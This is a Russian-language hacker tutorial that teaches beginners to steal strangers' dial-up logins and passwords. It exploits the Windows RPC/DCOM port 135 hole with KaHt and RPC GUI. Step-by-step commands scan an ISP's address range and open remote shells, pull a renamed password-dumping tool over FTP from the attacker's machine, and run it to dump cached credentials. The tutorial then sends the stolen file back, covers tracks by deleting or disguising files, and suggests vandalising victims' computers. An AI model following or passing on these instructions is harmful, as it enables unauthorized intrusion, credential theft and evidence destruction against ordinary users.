Как ты уже понял, мы будем воровать чужие пароли (и логины соответственно=) для доступа к интернету по Dial-Up, т.е. по телефонной линии. Для такого доброго дела есть несколько способов, но все они в своем существе сводятся к тому, что мы подключаемся к чужому компу с помощью експлойта и воруем с него пароли с помощью спец. трояна. Я рассмотрю практически все виды взлома, относящиеся к этому методу. Нам понадобстя 3 вещи для минимума и 5 вещей для максимума (если вы хотите на своей шкуре распробовать все способы добычи нета). Начинаем. А не хочешь ли ты собственно узнать, с чего все начиналось?:~) А начиналось все с того, что дядя Билл, пока писал свою очередную версию окон (дай бог памяти - Windows 2000), умудрился оставить страшную дыру в своей Виндоуз. В результате, операционная система вышла со страшной брешью, о которой поначалу никто не знал. Но, у хакеров нос длиньше чем у буратино, и скоро они, конечно же, обнаружили дырку в детище Microsoft. Я не буду углубляться в мельчайшие подробности - скажу лишь, что хакеры выявили уязвимость 135 (DCOM)-порта во всех версиях Windows NT (Windows 2000, XP). Они обнаружили, что через этот порт можно спокойно увидеть всю подноготную чужого компьютера, подключенного к сети, а также читать его содержимое, и, при наличии соответствующих прав (которые всегда открываюся юзверями для нашего наличия:~) писать на чужие винды. Впрочем.. что я тебе рассказываю.. Я ни хрена не знаю, какую там дыру нашли хакеры, и мне нет до этого дело. Наше дело правое. А их левое=))

1.) Итак, первое , что нам нужно, это:

Експлойт - специальная программа, которая обеспечивает юзерам (т.е. нам) полный доступ к чужому компу, использую какую-либо уязвимость в OC. Нам нужен эксплойт реализиующий захват ОС на основе бреши в 135 порту. В нете полно такихе эксплойтов-аналогов. Мы будем использовать KaHt - самый современный и забугорный експлойт на сегодня. Взять эту тузлу можно Тут. Внимание: Опасайтесь вместо подлинного Кахта поймать трояна (практически каждый 3-ий Кахт в нете троян!!!). Троян отличается от оригинала весом 60кб (реально должен весить 10,5 кб - обязательно это проверьте!!!) и тем, что он у вас в жизни нормально не запустится:--o

2.) Вторая необходимая для нас вещь - это фтп-сервер. Я надеюсь, что вы не раз сталкивались с фтп-серваками в нете - это огромный, или не очень, склад разнообразной инфы и программ, выложенной в сети и имеющий такую же папку-древовидную структуру, как в виндоузе. С помощью этой штуки мы будем делать коннект на наш комп с чужой машины и переливать трояна (см.вниз) на удаленную машину. Т.е. это, моно сказать, часть чьего-нибудь жесткого диска, к которому вы имеете обычно ограниченный доступ (можете только читать). Если вы хотите сделать доступной для своих друзей какую-либо инфу (порнушка, мультики==), то лучше фтп-сервера не придумаешь: выставил логин, пароль (выставлять необязательно, особенно если вы хотите сделать доступным ваш хард для всего нета=), домашнюю директорию (ту, в которой будет лежать ваше фуфло) и готово дело - запускаете фтп и наслаждайтесь тем, что на ваш хард позарились пол рунета:~) Но: мы для начала будем использовать не обычный фтп-сервер, а: RPC GUI - обязательно запомните это название, это просто заебатая штука. Она сочетает в себе: эксплойт (который отличается от Кахта тем, что сканирует не диапазон ип-адресов, а конкретный ип-адрес в сети, но об этом попозже), сканер портов (никому нафиг не нужно, или нафиг нужно:))), эмулятор-фтп сервера (то, что нам нужно - это не совсем фтп-сервер, но и не обычное ебло, просто его проще настраивать для новичка). Прога тоже очень раскрученная, смывайте её отсюда.

1.) Третье ебло, которое нам понадобится - это троян-тибрильщик паролей. Т.е. то, что мы запустим на компе юзверя, и это самое покажет нам все пароли, имеющиеся в данное время в кеше компа. Но троян нам нужен такой, который бы выведывал пароли под WinNT, так как Виндоус 9x мы трахнуть не сможем (потому что в ней нет никакой дыры). Я советую (даже не советую, а говорю, что это лучшее в своем классе): Dialupass - лучшая на данное время программа, которая показывает информацию об интернет-соединении пользователя в данный момент (телефон дозвона к провайдеру, логин, пароль, имя провайдера и еще пара ненужных штук). Любому хакеру известно, что Windows NT настолько разбитое окно, что пароли в нем хранятся на всем протяжении сеанса пользователя!!! Существует даже малодокументированная Win Api функция WEnumCachedPassword, которая ищет в кеше ОС пароли - именно этим и пользуется этот заебатый троян. Слить мона отсюда.

Тэээкс, абсолютный минимум у нас есть - теперь, с этим комплектом прог вам нипочем любые преграды - вы сможете надыбать кучу паролей:~) Но, если желаете стать настоящим хакером, то вы должны уметь ломать чайников с длинными носами и с помощью следующих 2 программ:

4.) TFTPd32 - это TFTP-сервер. Протокол TFTP немного отличается от протокола FTP. Но, лично я, чаще ворую пароли с помощью TFTP - так как на мой взгляд это требует меньших затрат. Вопсчем, эта штука может вас выручить, если по каким-либо причинам вам не удасться настроить FTP-сервер (а с этим у новичков часто бывают большие проблемы:=( Лежит прога вот тут.

5.) PabloFtp - а это, друзья мои, обычный ФТП-сервер. С ним работать чуть сложнее, чем с RPC GUI, так как его еще надо настраивать, но взамен вы приобретаете гибкую настройку прав доступа в вашу фтп-директорию. Валяется оно здеся.

Итак: мы вооружены до зубов и готовы биться за бесплатный интернет, тогда, побыстрее кончайте дрочить и пойдемте компы мочить:-()

Первым делом тебе надо отключитья свой фаеррвол - такая штука, которая тебя очень сильно защищает, а имеенно она охраняет 135 порт (на который мы будем покушаться). Фарр может явно поставить юзверь, а также 135 порт юзверям может закрыть сам провайдер (действительно, ведь это лучше, чем напоминать клиентам об их безопасности - чтобы сломать сетку провайдера, надо теперь поиметь шелл самого прова с рута и отключить у него 135 порт).Благодаря фару на твой комп не могут законнектиться враги и спереть у тебя любимый пассворд. И делает он это тем же методом, которым хакеры атакуют твой комп - ведь они пытаются атаковать через открытые порты машины - фаеррвол же строит свою защиту на том, что атакует их в ответ через порт, на который произошло покушение. И я думаю, что ты уже догадался, что мы будем делать коннект только на те машины, которые не защищены от наших атак - у которых отключен фаеррвол или они не имеют соответствующую заплатку от мелкомягких (которую дядя Билли выпустил с опозданием, да еще и положил на сайт, который никто не посещает:-). Так что шевели мозгами: отключая фарр - ты ставишь под угрозу свои пароли, включая фарр - ты не сможешь полностью проделать операцию по выведыванию чужих паролей. Чтобы отключить фар, выруби свой нет, щелкни 2 раза на своем подключении, зайди в "свойства", потом "дополнительно" и убери галочку "Защитить моё подключение к интернету", если она у тебя стоит. Снова запусти свой нет. На этом наши приготовления заканчиваются и подходит время к самому интересному - поиску незащищенных компов.

Но для удобства предлагаю создать тебе, например, в корне диска (у меня это c:\) специальную папку (у меня это c:\fack) и положить туда свои боезапасы. Итак создаем папку c:\fack и кладем туда все, что ты накачал, в том числе и кахт, и диалупасс и РПК ГУИ и все что хотите. Также не забудьте переименовать dialupass.exe во что-нидь другое (чтобы меньше глаз кололо) - для примера я переделал в w.exe.

Операция №1. МастдДай Провайдерс.

Итак, запусти кахт - ну как, хорошо??? KaHt - это консольное приложение, т.е. оно будет работать только из под командной строки, cmd, command.com - называй как хошь. Так или иначе, тебе нужно запустить сначала командную строку - такое черненькое страшное создание! Если у тебя икспюша, то залазий в "пуск->все программы->стандартные->командная строка". Из под NT командную строку также можно запустить, набрав cmd в "пуск->выполнить" (я предпочитаю этот вариант). Если ты сидишь в дерьмовом win9x (Windows 98, 98Se, Me), то командную строку можно вызвать набрав command.com в "пуск->выполнить" или соответсвенно найти её в "Пуск->Программы" - как она там называется, увы, не помню. (Кстати, если интересно, то cmd можно запустить из под Икспюш, набрав command.com в "пуск->выполнить" тоже - зачем Билл положил в Икспишные окна 2 командные строки??? - впрочем, не наше дело=) Тааакс, вот перед вами командная строка - белым по черному, мелкий шрифт - ах, как унизительно... но увы, выбора нет, придется вам учиться работать с командной строкой и зубрить кучу cmd-шних команд. Впрочем, это необязательно. Для тибринья паролей надо знать всего лишь несколько команд, которые я вам в процессе покажу. Итак, в cmd набираем:

c:\fack\kaht.exe диапазон айпишников 300

Чу, скажите вы.. что еще за диапазон айпишников и ваще что это за фуфло, можно поподробнее! Можно конечно. Кахт - это такой эксплойт, которому надо передать в параметрах диапазон ип-адресов, которые надо сканировать и можно еще передать кол-во потоков сканирования (по умолчанию будет 80, но советую вам сделать побольше, как у меня - 300 - скан пойдет быстрее). Так вот, для начала узнайте диапазон ип-адресов своего прова - для этого щелкните в трее на двух маленьких компьютерах, обозначающих ваше соединение с интернет, потом в "сведения" и мы видим 2 строчки: ип-адрес сервера и ип-адрес клиента. Так вот ип-адрес клиента - это ваш ип-адрес. А ип-адрес сервера - ип вашего прова (не волнуйтесь, вы его не сломаете, хотя как знать, что у вас за дебил в прова нарядился:--() Ип-диапазон провайдера складывается по такому принципе... а хер... с ним... объясню на примере. Допустим, ваш ип: 210.54.43.25, а ип-сервера: 210.54.43.193. Как видите, первые три цыфирки совпадают - они всегда будут одинаковыми. Дипазон складывается по принципу 210.54.43.x, где x - число от 1 до 255, т.е. фишку понимаете, диапазон вашего провайдера будет всегда 210.54.43.1 210.54.43.255 - просто меняем последние байты в ип-адресах на 1 и 255 (ваш ип будет всегда разным, если не знаете, так как он генерится динамически - при каждом дозвоне к провайдеру, этот дебил выделяет вам ип адрес с абсолютно любой цыфиркой на конце, в отличие от своего собственного айпи, который всегда одинаковый. Вот офигело, чмо, хакать его-хакать! - скажите вы.. что ж, делайте что хотите=). Я думаю, что вы все уяснили. Так вот после адреса кахта в смд ставите пробел и набираете диапазон ваших айпишников (или не ваших - можете сканить, что хотите, хоть весь инет - мне похуй). После дипазона можно также через пробел выставить кол-во потоков сканирования - ставьте всегда 300 и не надо мудиться. Т.е. в конечно счете в смд вы должны набрать вот это:

c:\fack\kaht.exe 210.54.43.1 210.54.43.255 300 - не забудьте указать точный адрес кахта и правильный диапазон ip-адресов.

И если вы все сделали правильно, то кахт уже не спрячет свою рожу, как было тогда, а сделает вам приветливую черно-белую гримасу и начнет сканирование сети в поиске незащищенных компов. Короче, вы должны увидеть следующее (для примера у меня другой диапазон айпи-адресов):

Внимание, если кахт так и не запускается (окошко появляется и исчезает), то у вас стопудово троян (см.выше).

Во время сканирования (а оно пройдет буквально за полминуты, если вы сканите своего прова), Кахт будет пытаться подключиться к незащищенным компам, на которые возможен доступ извне. Но подключаться он будет не ко всем, а только к проверенным хорошим дыркам=) Т.е. некоторые компы он почему-то отвергает, заявляя надпись DEFAULT (попытка не удалась). Затем он идет дальше. Итак, если кахт нашел уязвимый комп, то он коннектиться к нему и выводит строчку типа c:\windows\system32 - все... можешь кричать "Пошли все на ...! Я трахнул всех!" и гладить свой член по головке - теперь вы имеете почти полный доступ к чужой машине через командную строку. Читать вы обычно можете всегда. А вот удалять и писать - такие дырявые компы еще надо поискать.

Внимание: Если у тебя нет соответсвующей заплатки от МайкроСофт (а её у вас наверняка нет=) и отключен фарр (что мы и сделали), то кахт первым делом залезет на твой комп с бешеной скоростью. Это тупое происшествие будет происходить всегда - просто проверь ип-адрес зараженного компа с вашим (кахт отображает ип трахнутого компа) - видите, а они совпадают. Тогда вам ничего не остается сделать, как набрать в командной строке exit - этой командой нам еще частенько предстоит пользоваться при зависаниях смд и прочих неурядицах - она просто завершает сеанс командной строки с компом. Теперь кахт продолжит свой скан дальше. Нет, конечно, ты можешь поизвращаться и походить по своему компу через черное окно - дело твоё. Так или иначе прибереги эту команду - тебе придется её набирать при каждом запуске кахта (а лучше зайди в Internet Explorer, в "свойства" "Windows Update" и установи себе какое-то обновление от эксплойтов - как называется не помню - но название говорит само за себя).

Если компов больше нет, то кахт просто перестает сканировать и закрывает своё окно. На этой картинке наглядно показан процесс сканирования и подключения к компу:

Итак, у нас в руках чужое железо - давайте же над ним издеваться: оставим на рабочем столе файлики содержания типа "Пошел нахуй. Ай хак ю!", заменим существующие приличные обои на не совсем приличные, да и ваще отшатдауним этот комп в жопу. Впрочем, мы ведь - серьезные люди - пришли за паролями - так что давайте продолжим наше доброе дело.

Операция №2. РиллиДай Провайдерс.

Теперь нам надо запустить эмулятор фтп-сервера - RPC GUI. Запускаем прогу и перед нами появляется окошко, предназначенное для эксплойта конкретного компа по его ип-адресу (этим РПК ГУИ выгодно отличается от кахта - не надо ничего сканить - выставил то, что тебе нужно хакнуть и радуйся). Тут все просто: надо выбрать тип операционки на удаленной машине, желаемый порт для коннекта (самые имхо стабильные порты - 135 и 139 - лучше их не меняйте), удаленный порт (тоже лучше ничего не трогайте и не нажимайте батон "R", стоящий рядом - он генерирует случайный порт - что, у нас мозгов не хватит самому придумать порт в диапазоне от 2000 до 65000:-) и ввести, конечно же, ип компутера. Внизу под ипом расположены 4 батона (первые 3 из них абсолютно, имхо - бесполезные). Чтобы попытаться сделать коннект на удаленную машину, надо нажимать "Exploit!" - после чего вы увидите окошко, похожее на Kaht, и если RPC GUI удачно сделал коннект на удаленное железо - появится все та же надпись типа c:\windows\system32, и если коннект не удался, то он известит вас соответсвующим сообщением об ошибке. Если он говорит, что истек таймаут - то значит удаленный комп ваще не подключен к сети, и возможно ваще выключен из розетки=)), если он говорит, что не удалось подключиться из-за 3 возможных причин (типа ОС неправильная, ПО и ваще компьютер тупое ламо=) - то это сообщение означает то же, что и когда Кахт говорит Default - т.е. комп виноват, а не мы:~) И ваще эту хуля может много чего говорить на своем буржуйском - но нам это не надо - для експлойта мы решили использовать KaHt, значит нажимаем дальше - кнопку Port Scanner - посмотрели, красиво?? Это обычный сканер портов, который нам ни к чему - вводите начальный-конечный порты и ип компа, нажимаете Run Exploit и матереете - РПК покажет вам, какие порты у компа открыты. Вопсчем, для нас пока бесполезная штука. Теперь тыкаем на заветную клавишу "FTP Server>" - вот, то что нам нужно - эмулятор фтп-сервака. Выше я уже рассказывал большую гогомеду о фтп-сервере, так что на этот раз эту процедуру пропущу. На этой вкладке мы видим поле для ввода логина - "UserName" (можете оставить логин по умолчанию - asdf, а так - это на ваш вкус). Поле, где отображается ваш IP-адрес - "Your Ip" - его изменять нельзя, и оно само устанавливается в правильное значение - т.е. прога выясняет ваш ип и вписывает его туда, батон "clear" - очищает лог, самый главный батон "Start" запускает фтп-эмулятор, а также справа большое текстовое поле - это лог сервера (для тех, кто не знает, что такое лог - тут отображаются все действия, производимые с вашим фтп - кто, когда, с какого Ip'а вошел к вам на сервер, что, куда, какого хуя закачал и все подобное - эта очень удобная штука есть во всех Фтп и она помогает следить за тем, что происходит на вашем фтп).

Итак, нажимайте "Start" - в логе появляется строчка "FTP Server Started". И я думаю, что настало время объяснить вам, чем отличается фтп RPC GUI от обычного фтп-сервака (на подобии Pablo FTP), почему я называю его не фтп-сервером, а эмулятором фтп. Во-первых, эта прога открывает 21 порт (канал FTP) для обмена различного рода бинарной и не только инфой, как обычный фтп, но она не позволяет явно указывать хаум-директорию фтп, а также задавать пароль для входа на сервер. Т.е. это мне в ней и нравится - достаточно ввести логин и все - авторизация облегчена до минимума. Вот в принципе и все. В остальном это обычный фтп. Но использовать его для своих прямых обязанностей (типа дать народу музон послушать, да порнушку посмотреть) нереально!!!

Все.. фтп у нас запущен, в папке c:\fack лежит файлик w.exe (а-ля dialupass.exe). Движемся дальше. Заходим на чужое железо и после строчки c:\windows\system32 набираем cd.. и нажимаем Интер. Потом еще раз cd.. и Интер. Теперь мы перешли в корень жесткого диска на компе (c:\). Команда cd осуществляет переход в указанную директорию, а две точки (..) воспринимаются ОС типа Windows как родительская директория - т.е. cd.. означает переход на уровень выше. Если бы мы набрали например cd windows - то оказались в папке с ОС. Видите как все легко. Теперь вы можете шастать по каталогам на чужом харде.

Теперь сделаем коннект к нашему эмулятору фтп. Набираем ftp ваш_ип. Мы договорились, что наш ип - 210.54.43.25. Поэтому набирай ftp 210.54.43.25. После в командной строке появится запрос на ввод логина, а в логе RPC GUI строчка типа "ип_адрес_удаленной_машины connected" (обратите внимание, появилась ли такая строка в логе) - вводим наш логин - asdf (или какой у вас там?). Все - нажимайте Enter, и если вы ввели правильный логин, то вы получите в ответ.... а-а-а, ничего вы не получите - вас приветствует черная тишина командной строки. Однако вы не думайте, что не сконнектились со своим сервером. Посмотрите в лог RPC GUI - там должна появиться строчка типа "USER - Welcome, asdf" - это знак того, что вы нормально вошли и вас приветствует ваш же фтп, теперь вы открыли канал для передачи данных от вашего компа к чужому. Т.е. можете делать download и upload спокойно. Команда ftp какой-то_ип пытается соединиться с 21 портом удаленного компьютера, ип адрес которого указан в качестве параметре (в данном случае мы указали свой ип). Также вы можете ввести сначала ftp и нажать Enter, а потом, когда появится знак "ftp>" в смд, набрать open какой-то_ип - разницы никакой - первый вариант быстрее. Также расскажу о такой важной команде как bye - она действует в рамках фтп-соединения и занимается тем, что завершает корректно фтп-соединение и возвращает вас на то место, с которого вы сделали коннект. Т.е. если вы набирали команду ftp после c:\, вы вернетесь на этот же диск c:\, никуда не потеряетесь. Пришли - ушли, никто и не заметил=) В логе конечно же все записывается.

Теперь настало время залить наш w.exe на их хард, для этого в тишине вводим get c:\fack\w.exe и нажимаем Enter. Все - ждемс. Команда get закачивает файл с фтп-сервера на машину. Ей формат таков get адрес_закачиваемого_файла адрес_куда_поместить_скачанный_файл. В первом параметре мы ввели адрес тибрильщика паролей на нашем компе, второй опустили - поэтому файл w.exe закачается по умолчанию туда, откуда мы сделали коннект к фтп - т.е. на диск c:\. Теперь посмотрите в лог, и если вы правильно ввели адрес закачиваемого файла, то там должны появиться примерно следующие строчки PORT - Data Port Recieved! RETR - Preparing to send file - с:\fack\w.exe (16896 bytes) Это значит, что файл успешно качается на машину... ждем... ждем.. еще... пока в логе не появится строчка: Finished Sending File! Она означает, что закачка завершена, мы можем дальше выполнять команды фтп (в окне командной строке все будет по-прежнему тихо - не обращайте на это внимание=). Можете конечно накачать с чужого компа кучу бесполезной инфы или перекачать ему со своего кучу полезной инфы:--) Но мы этого пока делать не будем, до поры-до времени. Мы пока выйдем из фтп, а ваще-то это делать необязательно - оставьте кахт открытым - все, троян на компе жертвы. Теперь мы заходим в RPC GUI на закладку "Exploit" и вводите ип-адрес компа, который только что заразили трояном (кахт показывает ипы зараженных компов). Нажимаем "Exploit", и если вы ввели верный IP, то сейчас же окажитесь на том же компе, который у вас открыт в кахте - видите, как удобно сделан RPC GUI - кахтом можно делать операции с ФТП, а с РПК ГУИ в это время смотреть чужие пароли. Но ладно. Зашли на комп (c:\windows\system32), нажимаем cd.. , пока не попадем в корень - там должен лежать наш троян w.exe. Как проверить, что он там лежит - в этом нам поможет просто супер команда, которой вы должны пользоваться очень часто - dir. Эта команда, если она запущена без параметров, выводит список всех папок и файлов, которые находятся в текущей директории (из которой произошел запуск команды - в нашем случае - это корень харда - c:\). А параметров у неё слишком много (если интересно, то наберите dir /? - все узнаете сами=) Т.е. нам отобразятся всё, что находится на диске c:\ жертвы. Если там есть файл w.exe, то радуйтесь, иначе попробуйте повторить закачку файла.

Теперь набираем в RPC GUI w.exe /all /stext "c:\hack.txt" - этой командой мы создаем на диске c:\ файлик hack.txt, который будет содержать логин, пароль, телефон и еще некоторую инфу подключения юзера. Поподробнее - набирая w.exe вы запускаете троян на чужом компе, только невидимо для жертвы, потому что вслед за этим идут команды /all /stext "c:\hack.txt" - это собственные команды трояна dialupass.exe: /all говорит, что троян должен создать файлик с паролями для всех пользователей компа, /stext говорит, что файлик должен иметь текстовый формат, "c:\hack.txt" - а это собственно адрес создаваемого файла. Также вы можете создать хтмл-файл - конечно это вам нафиг не нужно ,потому что разбирать хтмл в cmd - сущий геморрой, но все же, если вы так любопытны, я вам это тоже скажу - набирайте w.exe /allusers /shtml "c:\hack.html"как видите, тут тоже ничего сложного - мы создаем файл, формата HTML на диске с:\ под именем hack.html, в котором отображается инфа о подключении всех юзверей компа. Говорю сразу, что первый вариант - менее геморройный.

Операция №3. ЗеЕндДай Провайдерс.

Все - текстовый (или HTML) файл с паролем лежит на компе юзера. Для того, чтобы узнать пароли, у нас есть 2 способа: 1.) Можно просто прочитать этот файл прямо на удаленной машине, для этого надо набрать команду more hack.txt - в результате прямо в этом черненьком окошке вылезет содержимое текстового файла hack.txt, который лежит в текущей директории. Теперь вам остается взять бумажку, ручку и переписать логин и пароль юзверя - содержимое файла представлено в удобном для восприятия виде. О команде more - её формат: more адрес_текстового_или_plain text_файла. Она построчно (чтобы было удобно читать, если файл большой) выводит текстовый или хтмл, да и ваще любой файл, представляя его, если надо, в бинарном виде (например екзешники). Для чтения файла (если он длинный) используйте Enter. Если так будете смотреть HTML, то придется разбирать весь хтмл-код страницы и искать там ячейки с паролем, логином и телефоном хакнутого бегемота=) Если что, то команда type выводит также содержимого какого-либо файла, только полностью (не построчно) 2.)А можно закачать этот самый файл с паролями себе на комп с помощью фтп. Для этого надо в открытом фтп-соединении (у вас же открыт кахт=) набрать следующее put hack.txt c:\fuck\1.txt - команда put очень хорошая - она закачивает файл, указанный в её первом параметре (hack.txt, который лежит в текущей директории) c локального компа на нашу машину (на фтп-сервер) по адресу, указанному во втором параметре - в данном случае файлик закачается в папку c:\fuck\ под именем 1.txt, если не указывать второй параметр - то файл закачается по умолчанию в корень нашего харда - диск c:\. Вот так вот все легко.

Все - можете крикнуть несколько раз "I hack you, very much MustDie!" громко вслух, что весь дом сбежался и порадовался вашему счастию, а потом пригласил экипировку ментов к тебе домой. Ты получил свой первый пароль. Теперь уже никто не осмелится назвать тебя чайником с длинным носиком=)) Но......... СТОП!!!! Ты уже собрался закрывать RPC GUI и KaHt... а как насчет того, чтобы замести следы преступления - ведь троян и файл с паролями лежат на самом видном месте на машине жертвы - надо бы убрать эти файлы куда подальше. Так что быстро набирай del w.exe (я думаю, не стоит говорить, что после каждой команды надо нажимать Enter;--), а потом del hack.txt. Команда del удаляет какой-либо файл или директорию, которая указана в следующем за ней параметре - мы сначала удалим трояна с текущей директории, а потом и текстовик. Если хотите например удалить все файлы в какой-нидь директории (допустим в "program files"=)), то набирайте del "c:\program files\*.*", потом просто подтвердите ваш запрос клавишей y.

Внимание: Так просто взять и удалить файлы с чужого компа у вас может и не получится. У вас могут отсутствовать соответствующие права на это. Тогда нам придется придумать что-то другое. Итак, если вы не можете удалять файлы, то набирайте move w.exe "c:\windows\system32\sys.exe", а потом что-нидь типа move hack.txt "c:\windows\system32\logsys.txt", чтобы глупый юзверь на нас ничего не думал. Команда move перемещает файл, адрес которого указан в первом параметре на место, которое указано во втором параметре. Как видите, я перемещаю эти файлы делко в глушь винды, да еще и под такими именами, что на них ничего плохого не подумаешь=:~o Теперь проверьте с помощью dir, что все следы заметены - ваших файлов не осталось и можете уходить сканить другой комп, для этого в кахте (у нас там вроде открыто фтп-соединение:) делайте bye, после этой команды фтп-канал должен закрыться и вы должны оказаться на том же месте, откуда зашли на фтп - диск c:\. А в логе должна появиться соответствующая надпись QUIT - User logged out. RPC GUI можете закрывать - он нам пока не нужен. В кахте с диска (из ФТП же мы вышли) набираем exit, в результате чего кахт пойдет сканить следующие компы и если найдет уязвимые, то обязательно вам скажет. Теперь вы можете продолжать дыбать себе пароли уже других чайников